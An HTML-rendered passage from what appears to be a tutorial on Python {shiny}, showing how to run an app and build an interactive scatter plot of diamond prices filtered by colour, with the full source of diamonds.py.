&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; App(frontend, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="running-my-application"&gt;Running my application&lt;/h3&gt;
&lt;p&gt;The {shiny} python package also has a command line tool to run the application.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shiny run --port &lt;span style="color:#a5d6ff"&gt;5000&lt;/span&gt; hello.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;would start the app. Navigate to &amp;ldquo;localhost:5000&amp;rdquo; to see your app.&lt;/p&gt;
&lt;h2 id="something-a-little-more-interesting"&gt;Something a little more interesting&lt;/h2&gt;
&lt;p&gt;We will build a simple web application that will let us dynamically update a plot of prices of different diamonds, depending on the user choice of colours.&lt;/p&gt;
&lt;p&gt;{shiny} python provides a host of widgets that can be used to take input from a user, which will send that data to the back end server. It also provides
a set of output containers in which to render results received from the server. A simple user interface for this might be defined as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ui
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotnine.data&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; diamonds
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# function that creates our UI based on the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# we give it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_ui&lt;/span&gt;(data: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# calculate the set of unique choices that could be made&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; choices &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;unique()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# create our ui object&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app_ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page_fluid(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# row and column here are functions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# to aid laying out our page in an organised fashion&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;row(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;column(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, offset&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# an input widget that allows us to select multiple values&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# from the set of choices&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;input_selectize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;select&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Color&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; choices&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;list(choices),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; multiple&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;column(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;column(&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# an output container in which to render a plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;output_plot(&lt;span style="color:#a5d6ff"&gt;&amp;#34;out&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; app_ui
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;frontend &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; create_ui(diamonds)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first arguments of both the input widget and output container are a unique id. These ids will be used on the server side to identify the inputs and outputs
that we want to work with.&lt;/p&gt;
&lt;p&gt;Our &lt;code&gt;input_selectize(&amp;quot;select&amp;quot;, ...)&lt;/code&gt; function, will respond to the user action taken in the browser and send the chosen values as an &lt;code&gt;input&lt;/code&gt; to the server function. This value is accessible based on its unique id &amp;ldquo;select&amp;rdquo; as &lt;code&gt;input.select()&lt;/code&gt;. Similarly the &lt;code&gt;output_plot(&amp;quot;out&amp;quot;)&lt;/code&gt; container will allow us to draw a chart
into that position in the application using the &lt;code&gt;@output(id=&amp;quot;out&amp;quot;)&lt;/code&gt; decorator referring to the id &amp;ldquo;out&amp;rdquo;. The output decorator will be accompanied by a renderer which will dictate how the object should be drawn to screen.&lt;/p&gt;
&lt;p&gt;We will use &lt;code&gt;plotnine&lt;/code&gt; to draw a graph based on a subset of diamonds data, chosen by the user. And define our server function as&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; render
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotnine&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;gg&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotnine.data&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; diamonds
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# utility function to draw a scatter plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_plot&lt;/span&gt;(data):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ggplot(data, gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;aes(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;carat&amp;#39;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;price&amp;#39;&lt;/span&gt;, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;geom_point()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; plot&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;draw()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# wrapper function for the server, allows the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# to be passed in&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_server&lt;/span&gt;(data):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;f&lt;/span&gt;(input, output, session):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@output&lt;/span&gt;(id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;out&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# decorator to link this function to the &amp;#34;out&amp;#34; id in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@render.plot&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# a decorator to indicate we want the plot renderer&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;select()) &lt;span style="color:#8b949e;font-style:italic"&gt;# access the input value bound to the id &amp;#34;select&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sub &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;isin(color)] &lt;span style="color:#8b949e;font-style:italic"&gt;# use it to create a subset&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; create_plot(sub) &lt;span style="color:#8b949e;font-style:italic"&gt;# create our plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; plot &lt;span style="color:#8b949e;font-style:italic"&gt;# and return it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; f
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; create_server(diamonds)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Full source, named &amp;ldquo;diamonds.py&amp;rdquo;, including creating the app object is&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# diamonds.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; App, ui, render
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotnine&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;gg&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotnine.data&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; diamonds
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# function that creates our UI based on the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# we give it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_ui&lt;/span&gt;(data: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# calculate the set of unique choices that could be made&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; choices &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;unique()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# create our ui object&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app_ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page_fluid(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# row and column here are functions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# to aid laying out our page in an organised fashion&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;row(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;column(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, offset&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# an input widget that allows us to select multiple values&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# from the set of choices&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;input_selectize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;select&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Color&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; choices&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;list(choices),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; multiple&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;column(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;column(&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# an output container in which to render a plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;output_plot(&lt;span style="color:#a5d6ff"&gt;&amp;#34;out&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; app_ui
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;frontend &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; create_ui(diamonds)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# utility function to draw a scatter plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_plot&lt;/span&gt;(data):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ggplot(data, gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;aes(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;carat&amp;#39;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;price&amp;#39;&lt;/span&gt;, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;geom_point()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; plot&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;draw()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# wrapper function for the server, allows the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# to be passed in&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_server&lt;/span&gt;(data):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;f&lt;/span&gt;(input, output, session):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@output&lt;/span&gt;(id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;out&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# decorator to link this function to the &amp;#34;out&amp;#34; id in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@render.plot&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# a decorator to indicate we want the plot renderer&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;select()) &lt;span style="color:#8b949e;font-style:italic"&gt;# access the input value bound to the id &amp;#34;select&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sub &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;isin(color)] &lt;span style="color:#8b949e;font-style:italic"&gt;# use it to create a subset&lt;/span&gt;
